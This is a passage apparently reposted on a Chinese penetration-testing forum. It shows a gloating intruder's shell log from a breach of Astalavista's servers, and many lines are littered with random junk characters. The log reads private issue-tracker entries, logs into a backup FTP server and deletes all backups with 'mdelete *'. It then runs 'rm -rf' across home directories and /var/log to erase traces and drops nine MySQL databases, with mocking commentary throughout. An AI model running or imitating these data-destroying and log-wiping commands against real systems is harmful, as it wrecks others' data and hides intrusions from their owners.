7 u7 L+ K' i; W! ~' y/ R3 z8 {// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…3 A5 r/ k8 ^1 Y: s2 K

0 ^* L' F  W" O, l3 nmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;) w, Y: t$ e# g2 S, ?9 b% h% x5 O1 k% w
+——————+———————————————————————————————+
. C5 C: {  @1 ^4 Z| iss_summary      | iss_description                                                                             |0 S2 Z8 w  \3 J6 }  h0 D: r. l
+——————+———————————————————————————————+* ]5 n# o+ [7 [3 X
| Website guidance | Virtual Girl which guides you trought the website.( X; T' U& J3 O

$ C$ r- T& x8 C& |8 w; _& cWe need a girl with who you can ( talk )!!!
$ i5 Y' G6 ~; I0 |9 p  pAlso for the News!1 b1 C+ @0 ]* O  T. x
So my suggestion is a girl who read you the news loud if you like!+ q, z5 F3 C  {0 v6 P* s' ]9 Q8 I
you can choose between read yourselfe or she read it for you or both!" |& a/ }! k: p+ u
" r5 ?# y! o- b+ U
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!( p# Z) `: t. z, h6 f2 F8 F8 z

' W" q1 S  H  p1 f- eHave a look on the example girls!!
+ Q4 A1 w' H% Z' D3 u1 R: Q) G) V4 D$ J* i: @
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
8 X, y0 I: n7 `1 z- t9 V6 Q' l$ K9 I7 u, n4 V. @( X
or that
3 h& T8 N8 y# ~0 P& ?
# h. s$ S5 d3 X8 V9 r$ A链接标记[url]http://www.yellostrom.de/[/url]
2 ~+ e! Q- |0 S/ n$ b$ ^: L3 g! Z- i5 O3 R: ^# i& |
|, r; _8 n( u4 S- S
+——————+———————————————————————————————+2 A. Z+ h# R" e. I6 ?& O
1 row in set (0.00 sec)
, U+ o& ?, B% L# H5 o* d5 W
* I0 q" h; p* O; |// ha ha.' G3 t% G2 B1 k8 [

6 E6 D* I4 _- @4 q, bmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
1 F1 r3 Q  G& r( T$ {! g1 [( K6 @+————————–+———————————————————————————————————–+' `8 l; A5 Q0 j2 M- x1 n( c
| iss_summary              | iss_description                                                                                           |! r5 O6 E! v; X/ V1 ~* j6 F2 f( C
+————————–+———————————————————————————————————–+
. |( w9 ?! ^; M$ [| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |
3 R& p. v! y) J& s) s6 Q+————————–+———————————————————————————————————–+
* _+ _, K8 R2 J! @+ K/ J1 row in set (0.00 sec)
2 F/ s3 B; \3 J, B$ Q7 q/ [( i! B2 [: ^# X) ~+ s% `
// LOL.1 L1 b% a) E& |3 p& h* r

: b& }" ^. p+ Y2 O% h5 jmysql> exit
& \+ N# t% j. T* M9 |Bye
4 B/ d# u/ t  |. _6 T
) f6 \5 M6 x& b/ xsh-3.2# ftp 212.254.194.163
6 n+ P4 q9 z7 c4 UConnected to 212.254.194.163.
5 p" p: J' O; u' [% y  \+ [5 O220 BackupCOM_VW FTP server ready.' L8 [% C- C, l
504 AUTH: security mechanism ‘GSSAPI’ not supported.
& B: W) e% G3 b$ M3 E; S504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
6 w# e3 O2 U' n% O; ?* J) hKERBEROS_V4 rejected as an authentication type
5 x+ Q* D6 l% E4 |6 E) C% \Name (212.254.194.163:root): astalavista.com
4 A( o7 U2 t$ [; B331 Password required for astalavista.com.  ^2 C0 I$ ]$ j" T' i1 p. r6 x( z+ P
Password:. U) c* r) e( c9 \
230 User astalavista.com logged in.$ V6 j& x/ k) R
Remote system type is UNIX.5 T( z; z4 V* a
Using binary mode to transfer files.
0 R3 i  m) _( z/ e9 I$ @  }& u3 Tftp> ls -la5 z( M6 J8 u! z  ?" A) T/ ?
227 Entering Passive Mode (212,254,194,163,2,188)
6 U, c  _% X; \( O150 Opening BINARY mode data connection for ‘file list’.
: o9 a. ^8 H/ A8 g2 C! F5 S; }( [$ zdr-x——   1 root users         4096 Jun  4 06:13 astalavista.com& u4 p# c) ~3 O( k
226 Transfer complete.8 j/ ]4 e2 [7 ?5 J0 l) t0 l! Z
ftp> cd astalavista.com+ B3 d4 Z6 \4 X2 O5 m  N
250 CWD command successful.
+ ~8 T" ~  m8 }$ J9 @0 Dftp> ls -la# }- I* e: _- l& r5 O
227 Entering Passive Mode (212,254,194,163,2,189); j# L: i( P3 m6 m0 h/ V
150 Opening BINARY mode data connection for ‘file list’.
% r7 h) ~0 V% Y0 f-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar9 s* i: w) V( T/ E8 {5 n. A1 V% s6 S
-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
* U: Z( k6 L. Q2 W-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2( R7 w2 }2 K* B7 E
-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar( l& ~  K3 Q9 G) \+ H/ D
-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar8 U# V+ b! l, z( q
[snip]* `' [2 `5 ]2 A
226 Transfer complete.. Y' ^) _5 ?# b- R) p
ftp> mdelete *. T1 y. T6 e) G
ftp> ls -la: W, }/ F* S- Q% Z* B0 U4 ^
227 Entering Passive Mode (212,254,194,163,2,193)9 p. b1 O) k! ]( X
150 Opening BINARY mode data connection for ‘file list’.
  M  X* d  {- M5 m! A4 i" C* \226 Transfer complete.
2 s* b7 A3 E! E* wftp>, |$ c, w7 `' G; H: m" L5 u
9 @& d4 O8 B. z, x' ~2 K
sh-3.2# cd /home- B( D5 A4 ~% @& t6 ~
sh-3.2# ls -la# D) Y2 t* V3 G* a" `( x0 g/ K
total 1206 E0 V. l# q& x) Z
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .# ?/ U6 h* E8 p$ L
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..0 P3 L" }3 y: N7 D3 A
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin, q: W( J) b, \) f' c' R; A& X
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group4 Z2 I0 I8 {6 c8 M, v) {
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
) j5 ~7 `# p( L4 c2 ddrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet  V2 l0 W( t/ p8 U5 {
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup: ~+ U# U( Q$ Q9 A: f* z$ a- o8 F! L
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161, q4 d6 ~# z$ X" Z) b
drwx–x–x 10 com     com      4096 Apr 28 12:40 com2 D, ^2 c) k8 E, B
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
* o/ G" A$ Y5 f" hdrwx——  3 jon     jon      4096 Sep 21  2007 jon) x) U- L' t. M% b9 l
drwx——  2 root    root    16384 Sep 11  2007 lost+found, {8 Z5 c2 T! K! V- Q
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
1 r+ _" f+ W+ D: s/ A& Idrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata+ [9 [& ~! X  ~* Y
drwx——  2 jon     jon      4096 Sep 15  2007 test7 K: k0 `( u5 u. A# w
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
# s, ?1 J5 C4 u2 Z! K3 w! m# [7 k+ R& F6 ?, r% J. d
sh-3.2# rm -rf backup/
5 _8 C+ L  \& o# f$ rsh-3.2# rm -rf backup.14161/
, g! n( a; q. ^' Bsh-3.2# rm -rf ftp/: f6 X1 Z& q) @- H5 o
sh-3.2# rm -rf jon/
: u. w$ e( F- r; ~& y0 V+ d; Gsh-3.2# rm -rf my/
4 U) c& Q* p# M4 O6 [: c; zsh-3.2# rm -rf mysqldata/
: n, `; g; O% T9 s9 @: Fsh-3.2# rm -rf test/
( _  G6 k( \0 [% u! e2 V. }' Vsh-3.2# rm -rf tmp/3 w" Q( I: q3 Z
sh-3.2# cd ~
' P0 T7 K& e& ~8 Z7 j0 Osh-3.2# rm -rf *% Z) t$ p" M6 z
sh-3.2# rm -rf /var/log/# D: |3 [; s& }" a3 A
rm: cannot remove directory `/var/log//proftpd’: Directory not empty( P5 B  V. `% c9 S& i4 Z
sh-3.2# rm -rf /home/*9 e# u( x( x: S
sh-3.2# mysql
+ F4 K( j# U5 x( w& E# p: pWelcome to the MySQL monitor.  Commands end with ; or \g.  V1 Q. j( B5 T
Your MySQL connection id is 407156$ u! c8 R6 b) }" _
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
  y0 ?' P. ]3 L* F+ f1 y# f/ A) i9 a) q1 \/ Q
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.2 \0 w" B; Y* X9 h

1 f. \  `( I  I, ~" N4 [mysql> show databases;( _0 W4 R2 ~' t+ M% g
+———————–+
3 U) M8 i4 n0 M/ \0 H9 n6 T! ?1 O% M| Database              |+ R7 C+ D7 ~, i: y
+———————–+
8 q0 z5 k" Q: S, l! p/ g| information_schema    |
2 O9 b/ R9 d( z3 T  n4 ~) O) H5 D| astanet_ads           |  l7 A- S, u4 M$ T
| astanet_mailing_lists |
" \6 y4 A0 V" o) w| astanet_mediawiki     |
5 }/ `6 a' U0 e| astanet_membersystem  |
( i) c/ j5 P' a! o9 G1 n/ w+ ]3 O| com_contrexx          |
& ~; f+ W; X) `) s" Q) O| com_contrexx2         |, v4 j5 s1 A  w6 f0 N+ I$ q" S2 S5 ?
| com_contrexx2_live    |
, w0 l6 w1 p2 ?7 A+ u| da_roundcube          |+ S. [( L* S* W' X$ W, V- ]$ P
| dolphin               |
! g* B8 d; P1 {2 B* t2 h| ideapool              |
2 s) ~3 ^/ h+ P1 A6 M3 w| mysql                 |1 m, ?+ p4 s% q2 y: r
| test                  |4 \8 f: ^! d  \5 E. E
| yourmaster            |, `5 ~0 W* |$ G7 f# G: k) v, b, C1 k
+———————–+# G* }! U8 Y8 T
14 rows in set (0.03 sec)7 e3 z: p4 E% f2 z# W. g# ?

& P' e& [- v& z: y' ]# `mysql> drop database astanet_membersystem;! l7 F$ |& ^$ Q. p
droQuery OK, 46 rows affected (0.81 sec)/ K+ }; h5 }& @, _* F( f
* O7 v2 J  c: k9 B& p7 A
mysql> drop database com_contrexx;3 j! K$ B( C- b  N/ k' ]7 O
Query OK, 211 rows affected (2.72 sec)/ o- y5 X, e" l3 c3 E5 C5 V
# d/ T- c& c5 q
mysql> drop database com_contrexx2;
4 N+ x; g8 @1 |+ e  T, t# lQuery OK, 237 rows affected (2.23 sec)
+ f, t- P( }+ |% N, b
- a; i3 Q' P% pmysql> drop database com_contrexx2_live;
7 u  R# r: Y$ K) R0 l4 v% wQuery OK, 227 rows affected (7.63 sec)9 ?% W' P. d, z
  ^( I) C- a9 \5 _4 y* w
mysql> drop database ideapool;6 K/ Q- X. \6 F1 _8 l# e% R  B* I9 s
Query OK, 69 rows affected (0.19 sec)
+ p( Z4 @) b" T$ D( n1 n$ T$ s- I- T* t- B3 I" r
mysql> drop database yourmaster;" M! o/ q; w$ h* ~
Query OK, 158 rows affected (0.55 sec)- c- E! [$ D3 @8 s$ k

$ Y$ I) V4 ^" ^/ {$ @5 ?mysql> drop database astanet_ads;5 U* G* z2 C" }! _) P
Query OK, 9 rows affected (0.11 sec)
1 _9 J; ?9 o! v7 [) \$ u7 F, m
  e: ]- |+ v& X7 t4 D9 imysql> drop database astanet_mailing_lists;  B. T! F7 j4 ^5 T7 r
Query OK, 24 rows affected (1.47 sec). O* o3 ?: b2 m+ @% x, c' _$ b

. L; f9 k' Z) J4 S/ umysql> drop database astanet_mediawiki;0 \0 j0 Z% G9 _) |- w  S& x
Query OK, 31 rows affected (0.51 sec)
6 ~! R3 H7 t* B7 g
, y: Y, p7 V9 `+ [6 U1 }mysql> show databases;" R  |4 t. A+ d  r. |) z3 n
+——————–+
" v( R- l1 R+ ~6 i| Database           |0 \' I% ~/ @2 j2 x
+——————–+/ l4 J3 {1 I9 f1 F4 r
| information_schema |
" i3 ?& k) x  E| da_roundcube       |
4 Q  j; W9 P; G. j| dolphin            |
4 C! k1 z4 ?8 A7 {  a4 B| mysql              |
( {6 g  D* O, X7 f| test               |4 o! o" |* a& N% g( G' B
+——————–+
) S, e' c3 G* C5 rows in set (0.00 sec)$ F$ k+ S# U0 c* F0 q6 _
  g+ ^. {0 g! q! c" b! y* N6 u
What a journey! We’re not sure exactly why the “Terminator” had any influence on6 S4 D2 u  y( a
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the. ]! f8 {3 ~7 v& \+ h6 ^, J
wrong to say this pack of morons *wont be back*.
# h1 m1 C; U3 w5 V3 V  E



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2